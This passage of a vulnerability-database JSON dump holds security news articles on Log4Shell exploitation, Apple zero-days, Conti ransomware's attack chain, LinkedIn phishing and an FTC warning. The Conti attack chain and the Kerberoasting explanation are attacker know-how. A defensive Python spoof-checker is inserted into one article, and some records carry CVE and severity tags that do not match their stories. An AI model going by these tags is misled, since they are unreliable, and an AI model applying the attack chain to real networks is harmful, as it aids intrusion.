Department of Homeland Security's Cyber Safety Review Board (CSRB) [deemed](<https://www.dhs.gov/news/2022/07/14/cyber-safety-review-board-releases-report-its-review-log4j-vulnerabilities-and>) the critical vulnerability in the open-source Java-based logging framework an endemic weakness that will continue to plague organizations for years to come as exploitation evolves.\n\nLog4j's [wide usage](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) across many suppliers' software and services means that nation-state actors and commodity operators alike have opportunistically taken advantage of the vulnerability to mount a wide range of attacks.\n\nThe Log4Shell attacks also follow a recent report from Mandiant that detailed an espionage campaign aimed at Israeli shipping, government, energy, and healthcare organizations by a likely Iranian hacking group dubbed [UNC3890](<https://thehackernews.com/2022/08/suspected-iranian-hackers-targeted.html>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-27T03:23:00", "type": "thn", "title": "Iranian Hackers Exploiting Unpatched Log4j 2 Bugs to Target Israeli Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-08-27T03:23:28", "id": "THN:DF2B6840863D6847D7088B1A07B19A4A", "href": "https://thehackernews.com/2022/08/iranian-hackers-exploiting-unpatched.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-01T12:06:27", "description": "Linus Torvalds, the creator of Linux and Git, has his own law 
in software development, and it goes like this: \"_given enough eyeballs, all bugs are shallow_.\" This phrase captures the core principle of open source: the more, the merrier. If the code is readily available for anyone and everyone to fix bugs, it should be pretty safe. But is it? Or is the saying \"all bugs are shallow\" only true for _shallow_ bugs and not ones that lie deeper? It turns out that security flaws in open source can be harder to find than we thought. Emil W\u00e5reus, Head of R&D at [Debricked](<https://debricked.com>), took it upon himself to look deeper into the community's performance. Being a data scientist, he asked the data: _how good is the open source community at finding vulnerabilities in a timely manner_?\n\n## **The thrill of the (vulnerability) hunt**\n\nFinding open source vulnerabilities is typically done by the maintainers of the open source project, users, auditors, or external security researchers. But despite these code-archaeologists helping secure our world, the community still struggles to find security flaws. \n\nOn average, it takes _over 800 days_ to discover a security flaw in open source projects. For instance, the infamous Log4shell (CVE-2021-44228) vulnerability went undiscovered for a whopping 2649 days. \n\nThe analysis shows that 74% of security flaws remain undiscovered for at least one year. Java and Ruby seem to have the most challenges here, as it takes the community more than 1000 days to find and disclose vulnerabilities. Our [white] hats go off to the PHP/Composer community, which slightly outperforms the others. 
\n\n## **The needle in a techstack**\n\nAnother interesting finding is that some weakness types (CWE) seem to be harder to find and disclose, which contradicts Linus's law. Weaknesses of type CWE-400 (Uncontrolled Resource Consumption) and CWE-502 (Deserialization of Untrusted Data) typically aren't localized to a single function, or may appear as intended logic in the application. In other words, they can't be considered \"shallow bugs.\" \n\nIt also seems that the developer community is a bit better at finding CWE-20 (Improper Input Validation), where the flaw is most of the time just a few lines of code in a single function. \n\n## **Solve vulnerabilities with powerful remediation**\n\nWhy does this matter? As consumers of open source, and that's about every company in the whole world, the problem of vulnerabilities in open source is an important one. The data tells us that we can't fully trust Linus' Law: not because open source is less secure than other software, but because **not all bugs are shallow**.\n\nLuckily, there are powerful tools to perform at-scale analysis of a lot of open source projects at once. There have been cases of [white-hat hackers disclosing thousands](<https://www.youtube.com/watch?v=WkdzWiNKzt8>) of vulnerabilities at once using these methods. It would be naive not to assume that ill-minded organizations and individuals do the same. As an ecosystem that lays the foundation for our software-centric world, the community must significantly improve its ability to find, disclose, and fix security flaws in open source. 
\n\nLast year, [Google committed $10 billion](<https://blog.google/technology/safety-security/why-were-committing-10-billion-to-advance-cybersecurity/>) to advancing cybersecurity, including efforts to secure open source with a dedicated curator role that works alongside maintainers on specific security work. \n\nFurthermore, Debricked helps companies make these vulnerabilities actionable by scanning all your software, every branch, every push, and every commit, for new (open source) vulnerabilities. Debricked also continuously rescans old commits against every newly published vulnerability, to provide up-to-date, accurate, and actionable intelligence on the open source you consume, and helps developers fix security flaws with automated pull requests that won't cause dependency hell. \n\n## The truth lies in the data\n\nSo, knowing all this, what is the best way to protect your project or company against open source vulnerabilities? As we've seen in the case of Log4j and Spring4shell as well as in the numbers, we can never really trust that the community will find and fix all risks. There's a good chance that there are lots of undiscovered and undisclosed vulnerabilities in your code today, and there's not much you can do about that directly. \n\nAccording to Debricked, the best way to mitigate this is to build continuous vulnerability scanning into your SDLC: automatically scanning at every push of code, in combination with the machine learning-powered [vulnerability database](<https://debricked.com/vulnerability-database>), so that you learn about new vulnerabilities as soon as they are published. As soon as there's a fix, you can generate a [Fix Pull Request](<https://debricked.com/blog/debricked-launching-automatic-fix-pull-request/>) automatically or solve it manually with Debricked's help. _Currently, Debricked offers remediation for JavaScript and Go, with more language support to come shortly.
_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-01T12:04:00", "type": "thn", "title": "Last Years Open Source - Tomorrow's Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-11-01T12:04:08", "id": "THN:161777F5DB73EF3AB5B13EF9F11E3374", "href": "https://thehackernews.com/2022/11/last-years-open-source-tomorrows.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2022-01-26T23:19:30", "description": "Apple on Wednesday released 13 patches for serious security bugs in [macOS](<https://support.apple.com/en-us/HT213054>) and 10 for flaws in [iOS/iPadOS](<https://support.apple.com/en-us/HT213053>). They include fixes for two zero-day bugs, one of which may have been exploited by attackers in the wild.\n\nThe first zero-day 
(CVE-2022-22587) is a memory-corruption issue that could be exploited by a malicious app to execute arbitrary code with kernel privileges. The bug specifically exists in the IOMobileFrameBuffer \u2013 a kernel extension that allows developers to control how a device\u2019s memory handles the screen display, aka a framebuffer. It affects iOS, iPadOS and macOS Monterey, and Apple [addressed](<https://support.apple.com/en-us/HT213054>) it with improved input validation.\n\nApple also said it\u2019s aware of a report that indicates it may have been actively exploited in the wild.\n\nThe update is available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).\n\n## Data-Exposing Apple Safari Bug Squashed\n\nAlso out is a fix for a second zero day: a widely published WebKit flaw in the pervasive Safari browser that\u2019s tracked as CVE-2022-22594. The information-disclosure issue affects browsers for macOS, iOS and iPadOS. [Disclosed by FingerprintJS researchers last week,](<https://threatpost.com/apple-safari-bug-browsing-data-google-ids/177809/>) it allows a snooping website to find out information about other tabs a user might have open.\n\nThat bug is a cross-origin policy violation in the IndexedDB API \u2013 a JavaScript API provided by web browsers to store structured objects in a client-side NoSQL database \u2013 that Apple also addressed with improved input validation.\n\nTypically, a web browser permits scripts on one web page to access data on a second web page only if both pages have the same origin (the same scheme, host and port). 
Without this security policy in place, a snooper who manages to inject a malicious script into one website would be able to have free access to any data contained in other tabs the victim may have open in the browser, including access to online banking sessions, emails, healthcare portal data and other sensitive information.\n\nJohn Bambenek, principal threat hunter for Netenrich, told Threatpost on Wednesday that zero-days like these two \u2013 ones that can allow remote-code execution (RCE) on mobile devices \u2013 are \u201camong the most dangerous there are.\u201d\n\nThink mobile spyware, think [Pegasus](<https://threatpost.com/pegasus-spyware-state-department-iphones/176779/>), think nation-state espionage.\n\n\u201cOften, these types of bugs are used \u2026 with significant ill intent or by governments engaged in human-rights abuses,\u201d Bambenek said via email. \u201cUnfortunately, we will likely see more of these bugs as the year goes on.\u201d\n\nThe patches are available in the macOS Monterey 12.2 and the iOS/iPadOS 15.3 updates. 
iOS 15.3 also brought fixes for security issues that could lead to apps gaining root privileges, the ability to execute arbitrary code with kernel privileges, and the ability for apps to get at user files through iCloud.\n", "cvss3": {}, "published": "2022-01-26T22:19:57", "type": "threatpost", "title": "Apple Fixes 2 Zero-Day Security Bugs, One Exploited in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-22587", "CVE-2022-22594"], "modified": "2022-01-26T22:19:57", "id": "THREATPOST:B8BEEE8F3BDF1B6AD88639DA8C4595EA", "href": "https://threatpost.com/apple-zero-day-security-exploited/178040/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-21T18:13:55", "description": "The Conti ransomware gang, which last week became the first professional crimeware outfit to adopt and weaponize the Log4Shell vulnerability, has now built up a holistic attack chain.\n\nThe sophisticated Russia-based Conti group \u2013 which Palo Alto Networks [has called](<https://unit42.paloaltonetworks.com/conti-ransomware-gang/>) \u201cone of the most ruthless\u201d of dozens of ransomware groups currently known to be active \u2013 was in the right place at the right time with the right tools when [Log4Shell hit the scene](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) 10 days ago, security firm Advanced Intelligence (AdvIntel) said in a [report](<https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement>) shared with Threatpost on Thursday.\n\nAs of today, Monday, Dec. 
20, the attack chain has taken the following form, AdvIntel\u2019s Yelisey Boguslavskiy told Threatpost: Emotet -> Cobalt Strike -> Human Exploitation -> (no ADMIN$ share) -> Kerberoast -> vCenter ESXi with log4shell scan for vCenter.\n\n## Attack Chain\n\nStepping through that attack chain:\n\n 1. **Emotet** is a botnet that resurfaced last month on the back of TrickBot, now with the ability to directly install \u2026\n 2. [**Cobalt Strike**](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>), the legitimate, commercially available tool used by network penetration testers on infected devices and pervasively adopted by cybercriminals. It gives threat actors direct access to targets and, according to Boguslavskiy, precedes\u2026\n 3. **Human Exploitation**, which describes the stage of an attack in which threat actors personally investigate the network, looking for critical data, analyzing the network structure, defining the most important network shares, and looking at ways to elevate privileges, among other things. That poking around is followed by \u2026\n 4. **Missing ADMIN$ share.** Administrative shares are hidden network shares created by Microsoft\u2019s Windows NT-based operating systems that grant system administrators remote access to every disk volume on a network-connected system. As [Microsoft](<https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/problems-administrative-shares-missing>) puts it, \u201cMissing administrative shares typically indicate that the computer in question has been compromised by malicious software.\u201d Next up comes \u2026\n 5. **Kerberoast.** Kerberoasting is a common post-exploitation technique that exploits a combination of weak encryption and poor service-account password hygiene: any domain user can request Kerberos service tickets for accounts that have service principal names, and because each ticket is encrypted with a key derived from that service account\u2019s password, the tickets can be taken offline and cracked. With regards to the final link in the attack chain, the Conti gang last week zeroed in on \u2026\n 6. 
**VMware vCenter servers.** As of Wednesday, Dec. 15, Conti was looking for vulnerable VMware networks for initial access and lateral movement. The VMware servers are on a dismayingly [long list](<https://github.com/YfryTchsGD/Log4jAttackSurface>) of affected components and vendors whose products have been found to be vulnerable to Log4Shell.\n\nWithin two days of the public disclosure of the vulnerability in Apache\u2019s Log4j logging library on Dec. 10 \u2013 a bug that came under attack within hours \u2013 Conti group members were discussing how to exploit it as an initial attack vector, according to AdvIntel.\n\nApache patched the bug on Dec. 11, but that first patch [was found to be incomplete](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) in certain non-default configurations, paving the way for denial-of-service (DoS) attacks in certain scenarios.\n\nAs if two bugs aren\u2019t enough, yet another, similar but distinct bug was [discovered](<https://threatpost.com/third-log4j-bug-dos-apache-patch/177159/>) last week in the Log4j logging library. Apache issued a patch on Friday.\n\n## Conti Winds Up Its Exploit Machine\n\nAccording to the Thursday AdvIntel writeup, from Vitali Kremez and Yelisey Boguslavskiy, multiple Conti group members on Dec. 12 began to chat about exploiting the Log4Shell vulnerability as an initial attack vector. That led to scanning for vulnerable systems that AdvIntel first tracked the next day, on Dec. 13.\n\n\u201cThis is the first time this vulnerability entered the radar of a major ransomware group,\u201d according to the writeup. The emphasis is on \u201cmajor,\u201d given that the first ransomware group to target Log4Shell was a ransomware newcomer named [Khonsari](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>). 
As Microsoft has [reported](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/#Minecraft>), Khonsari was locking up Minecraft players via unofficial servers. First spotted by [Bitdefender](<https://www.bleepingcomputer.com/news/security/new-ransomware-now-being-deployed-in-log4shell-attacks/>) in Log4Shell attacks, the ransomware\u2019s demand note [lacked a way to contact](<https://www.bleepingcomputer.com/news/security/microsoft-khonsari-ransomware-hits-self-hosted-minecraft-servers/>) the operators to pay a ransom. That means that Khonsari is more of a wiper, meant to troll Minecraft users by taking down their servers, rather than ransomware.\n\nKhonsari was just one of the malware families thrown at vulnerable servers over the course of the Log4j saga. Within hours of public disclosure of the flaw, [attackers](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) were scanning for vulnerable servers and [unleashing quickly evolving attacks](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) to drop coin-miners, Cobalt Strike, the Orcus remote access trojan (RAT), reverse bash shells for future attacks, [Mirai and other botnets](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>), and backdoors.\n\n## A Perfect Storm\n\nLog4Shell has become a focal point for threat actors, including suspected nation-state actors who\u2019ve been observed investigating Log4j2, AdvIntel researchers noted. 
The compressed timeline of public disclosure followed fast by threat-actor interest and exploits exemplifies the accelerated trajectory of threats witnessed since the [ProxyLogon](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) family of bugs in Exchange Server in March and the subsequent attacks, they said: \u201cif one day a major CVE is spotted by APTs, the next week it is weaponized by ransomware,\u201d according to their writeup.\n\nBut out of all the threat actors, Conti \u201cplays a special role in today\u2019s threat landscape, primarily due to its scale,\u201d they explained. It\u2019s a highly sophisticated organization, comprising several teams. AdvIntel estimates that, based on scrutiny of Conti\u2019s logs, the Russian-speaking gang made over $150 million over the past six months.\n\nBut still they continue to expand, with Conti continually looking for new attack surfaces and methods.\n\nAdvIntel listed a number of Conti\u2019s innovations since August, including:\n\n * [Secret backdoors](<https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent>): Conti\u2019s use of the legitimate Atera remote-management agent lets the gang keep persistence in protected environments, especially those equipped with more aggressive, machine-learning-based endpoint detection and response (EDR) and antivirus products. 
\u201cThe IT management solution enables monitoring, management and automation of hundreds of SMB IT networks from a single console,\u201d AdvIntel described in an August report.\n * New [backup removal](<https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love>) solutions that expanded Conti\u2019s ability to [blow up backups](<https://threatpost.com/conti-ransomware-backups/175114/>).\n * An entire operation to revive [Emotet](<https://www.advintel.io/post/corporate-loader-emotet-history-of-x-project-return-for-ransomware>), which [resurfaced](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) in November.\n\nThe writeup shared a timeline of Conti\u2019s search for new attack vectors, shown below.\n\n[Timeline of Conti\u2019s search for new attack vectors](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/20163220/conti_timeline-e1640035956574.jpg>). Source: AdvIntel.\n\n## Keeping Your Head Above the Logjam\u2019s Water\n\nAdvIntel shared these suggested recommendations and mitigations for Log4Shell:\n\n * The Dutch National Cyber Security Center shared a list of the affected software and recommendations linked to each one of them [on GitHub](<https://github.com/NCSC-NL/log4shell/tree/main/software>).\n * Here are [VMware\u2019s workaround instructions](<https://kb.vmware.com/s/article/87081>) to address CVE-2021-44228 in vCenter Server and vCenter Cloud Gateway (87081).\n\n## When Will It All End?\n\nLou Steinberg, former chief technology officer at TD Ameritrade, said it ain\u2019t over til it\u2019s over, \u201cAnd it\u2019s not over.\u201d\n\n\u201cWe don\u2019t know if we patched systems after they were compromised from Log4J, so it may be a while before we know how bad things are,\u201d he said in an article shared with Threatpost on Monday. \u201cThis will happen again. Modern software and systems are built from components which aren\u2019t always trustworthy. 
Worse, bad actors know this and look to subvert the components to create a way into otherwise trusted software.\u201d\n\n122121 10:25 Added more attack chain details provided by AdvIntel.\n\n122121 13:00 Removed brute-force from the attack chain, given that, as AdvIntel explained, the brute-forcing of encrypted hashes carried out in these attacks is a different kind of brute-forcing than the typical definition of trying numerous credentials.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T22:11:30", "type": "threatpost", "title": "Conti Ransomware Gang Has Full Log4Shell Attack Chain", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T22:11:30", "id": "THREATPOST:4D63851D1493E3861204B674ADBC7F01", "href": "https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-17T22:17:40", "description": "Emotionally vulnerable and willing to offer up any information that lands the gig, job seekers are prime targets for social engineering campaigns. And with the \u201cGreat Resignation\u201d in full swing, cybercriminals are having an easy time finding their next victim.\n\nJust since Feb. 1, analysts have watched [phishing email attacks impersonating LinkedIn](<https://www.egress.com/resources/cybersecurity-information/phishing/linkedin-phishing-attacks>) surge 232 percent, attempting to trick job seekers into giving up their credentials.\n\n\u201cCurrent employment trends help to make this attack more convincing,\u201d a new report from Egress said. \u201c\u2018The Great Resignation\u2019 continues to dominate headlines, and a record number of Americans left their jobs in 2021 for new opportunities. It is likely these phishing attacks aim to capitalize on jobseekers (plus curious individuals) by flattering them into believing their profile is being viewed and their experience is relevant to household brands.\u201d\n\nThe emails had subject lines that would be enticing to job hunters hoping to get noticed, like, \u201cWho\u2019s searching for you online,\u201d \u201cYou appeared in 4 searches this week\u201d or even \u201cYou have 1 new message,\u201d the Egress team said.\n\nThe [phishing emails](<https://threatpost.com/squirrelwaffle-fraud-exchange-server-malspamming/178434/>) themselves were convincing dupes, built in HTML templates with the LinkedIn logo, colors and icons, the report added. 
The scammers also name-checked well-known companies throughout the bodies of the phishing emails, including American Express and CVS Carepoint, to make the correspondence seem more legitimate, the analysts said.\n\nEven the email\u2019s footer lifted the company\u2019s headquarters\u2019 address and included \u201cunsubscribe\u201d links to add to the email\u2019s authenticity, the analysts pointed out.\n\n\u201cYou can also see the LinkedIn display name spoofing, which is designed to hide the webmail accounts used to launch the attacks,\u201d the report said.\n\n[LinkedIn phishing email](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/16154716/linkedin-phsihing-email.png>). Source: Egress.\n\nOnce a victim clicks the malicious links in the email, they are directed to a site that harvests their LinkedIn login and password.\n\n\u201cWhile the display name is always LinkedIn and the emails all follow a similar pattern, the phishing attacks are sent from different webmail addresses that have zero correlation with each other,\u201d the analysts added. \u201cCurrently, it is unknown whether these attacks are the work of one cybercriminal or a gang operating together.\u201d\n\n021722 09:18 UPDATE: LinkedIn sent the following statement to Threatpost:\n\n\u201cOur internal teams work to take action against those who attempt to harm LinkedIn members through phishing. We encourage members to report suspicious messages and help them learn more about what they can do to protect themselves, including turning on [two-step verification](<https://www.linkedin.com/help/linkedin/answer/544/turn-two-step-verification-on-and-off?lang=en>). 
To learn more about how members can identify phishing messages, see our Help Center [here](<https://www.linkedin.com/help/linkedin/answer/5342/phishing-emails?lang=en>).\u201d\n\n## **Data Scraping Attacks on Job Seekers**\n\nCredential phishing is not the only threat aimed at job seekers: Imperva, in a separate report, detailed how it stopped the [largest bot attack](<https://www.imperva.com/blog/imperva-mitigates-massive-bot-attack-of-400-million-requests/>) the company has seen to date, on a global job listing site.\n\nImperva didn\u2019t name the site, but said it was bombarded with 400 million bot requests from 400,000 unique IP addresses over four days in an attempt to scrape all of its job seekers\u2019 data.\n\nThe Imperva team added that these types of web-scraping attacks are common and can result in \u201clower conversion rates, skewed marketing analytics, decrease in SEO ranking, website latency, and even downtime (usually caused by aggressive scrapers).\u201d\n\nBut as Imperva pointed out in its report, data scraping is one of those cybersecurity gray areas. Collecting publicly available information isn\u2019t itself a data breach, but collected in mass quantities, it can be a weapon wielded against users in social-engineering attacks.\n\nLast summer, a massive [data-scraping attack against LinkedIn](<https://threatpost.com/linkedin-data-scrape-victims-targeted-attackers/167473/>) was discovered to have collected at least 1.2 billion user records that were later sold on underground forums. 
At the time, LinkedIn reiterated that the [scraped data was public information](<https://threatpost.com/data-700m-linkedin-users-cyber-underground/167362/>), not private information, and didn\u2019t qualify as a breach.\n\nLinkedIn isn\u2019t really at fault here, according to Yehuda Rosen, senior software engineer at nVisium.\n\n\u201cThis has little to do with LinkedIn specifically \u2013 they\u2019re not doing anything wrong here,\u201d Rosen explained to Threatpost. \u201cIt boils down to the fact that LinkedIn has hundreds of millions of members \u2013 many of whom are very accustomed to seeing frequent legitimate emails from LinkedIn \u2013 and may inevitably click without carefully checking that each and every email is the real deal.\u201d\n\nThat leaves it to individual users to be mindful of the information they expose publicly and how it could be used to trick them into clicking on a malicious link.\n\n\u201cWhile I don\u2019t believe that this will hurt LinkedIn\u2019s brand, this does reiterate the importance of email phishing education,\u201d Ray Kelly, with NTT Application Security, told Threatpost by email. \u201cGiven these emails are coming from a legit LinkedIn email address makes it especially difficult to identify the danger. My rule is to never click on email links. Always visit the site directly.\u201d\n
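The display-name spoofing the Egress report points at, a From: line that reads "LinkedIn" while the message actually leaves from an unrelated webmail account, is something a mail gateway or SOC can check mechanically. The block below is an added example written for this page; it is not Egress's or LinkedIn's detection logic. It parses the From: and Reply-To: headers of constructed sample messages and flags any message whose display name claims a brand but whose address domain is not one that brand sends from, with a Reply-To on a third domain as a weaker signal. The brand-to-domain table is an assumption to be maintained per environment, and every sample header is constructed.

```python
"""Display-name spoof check for brand-impersonating mail (added example for
this page; not Egress's or LinkedIn's detection logic). A message is flagged
when the From: display name claims a brand but the address domain is not one
the brand sends from; a Reply-To on a third domain is a weaker signal."""
from email import message_from_string
from email.utils import parseaddr
import re

# Assumption: which domains a brand legitimately sends from. Maintain this
# per environment; only linkedin.com is listed here for the example.
BRAND_DOMAINS = {
    "linkedin": {"linkedin.com"},
}


def address_domain(addr):
    return addr.rpartition("@")[2].lower()


def domain_matches(domain, allowed):
    """True when domain is one of the allowed domains or a subdomain of one."""
    return any(domain == a or domain.endswith("." + a) for a in allowed)


def brand_in_display_name(display):
    """Return the first brand whose name appears in the display name, ignoring
    case, spacing and punctuation ('Linked-In', 'LinkedIn Jobs' both match)."""
    compact = re.sub(r"[^a-z]", "", display.lower())
    for brand in BRAND_DOMAINS:
        if brand in compact:
            return brand
    return None


def check_display_name_spoof(raw_message):
    """Classify one RFC 5322 message string:
    ('spoof' | 'suspicious' | 'ok' | 'reject', reason)."""
    msg = message_from_string(raw_message)
    display, addr = parseaddr(msg.get("From", ""))
    if "@" not in addr:
        return ("reject", "From header has no parsable address")
    from_domain = address_domain(addr)
    brand = brand_in_display_name(display)
    if brand and not domain_matches(from_domain, BRAND_DOMAINS[brand]):
        return ("spoof", "display name claims %s but address is on %s"
                % (brand, from_domain))
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    if "@" in reply_addr and address_domain(reply_addr) != from_domain:
        return ("suspicious", "Reply-To domain %s differs from From domain %s"
                % (address_domain(reply_addr), from_domain))
    return ("ok", "no brand/domain mismatch")


# Constructed sample headers modelled on the campaign described in the article.
PHISH = """From: LinkedIn <linkedin.notifications.2022@gmail.com>
To: jobseeker@example.com
Subject: You appeared in 4 searches this week

(body omitted)
"""

LEGIT = """From: LinkedIn <notifications@e.linkedin.com>
To: jobseeker@example.com
Subject: You appeared in 4 searches this week

(body omitted)
"""

REPLY_TO_MISMATCH = """From: Recruiting Team <hr@example.com>
Reply-To: hr-example@mail.example.net
To: jobseeker@example.com
Subject: Interview invitation

(body omitted)
"""

if __name__ == "__main__":
    for name, raw in (("PHISH", PHISH), ("LEGIT", LEGIT),
                      ("REPLY_TO_MISMATCH", REPLY_TO_MISMATCH)):
        print(name, check_display_name_spoof(raw))
```

The check deliberately does not trust the display name at all: a subdomain of an allowed domain passes, a look-alike such as linkedin.com.evil.example does not, and a message with no parsable sender is rejected rather than scored. Authentication results (SPF, DKIM, DMARC) are the stronger control and belong upstream of a rule like this.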
\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-16T21:15:47", "type": "threatpost", "title": "Massive LinkedIn Phishing, Bot Attacks Feed on the Job-Hungry", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-16T21:15:47", "id": "THREATPOST:CAA9AA939562959323A4675228C233A5", "href": "https://threatpost.com/massive-linkedin-phishing-bot-attacks-hungry-job-seekers/178476/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-05T19:44:48", "description": "The Federal Trade Commission (FTC) will muster its legal muscle to pursue companies and vendors that fail to protect consumer data [from the risks of](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>) the Log4j vulnerabilities, it 
[warned](<https://www.ftc.gov/news-events/blogs/techftc/2022/01/ftc-warns-companies-remediate-log4j-security-vulnerability>) on Tuesday.\n\n\u201cThe FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future,\u201d according to the warning.\n\nThose companies that bungle consumer data, leaving vulnerabilities unpatched and thus opening the door to exploits and the resulting possible \u201closs or breach of personal information, financial loss and other irreversible harms,\u201d are risking consequences tied to weighty laws that have resulted in fat fines, the FTC said.\n\nIt mentioned, among others, the [Federal Trade Commission Act ](<https://www.ftc.gov/enforcement/statutes/federal-trade-commission-act>) and the [Gramm-Leach-Bliley Act](<https://threatpost.com/privacy-regulation-could-be-a-test-for-states-rights/138303/>). The FTC Act, the commission\u2019s primary statute, enables it to seek monetary redress and other relief for conduct injurious to consumers. 
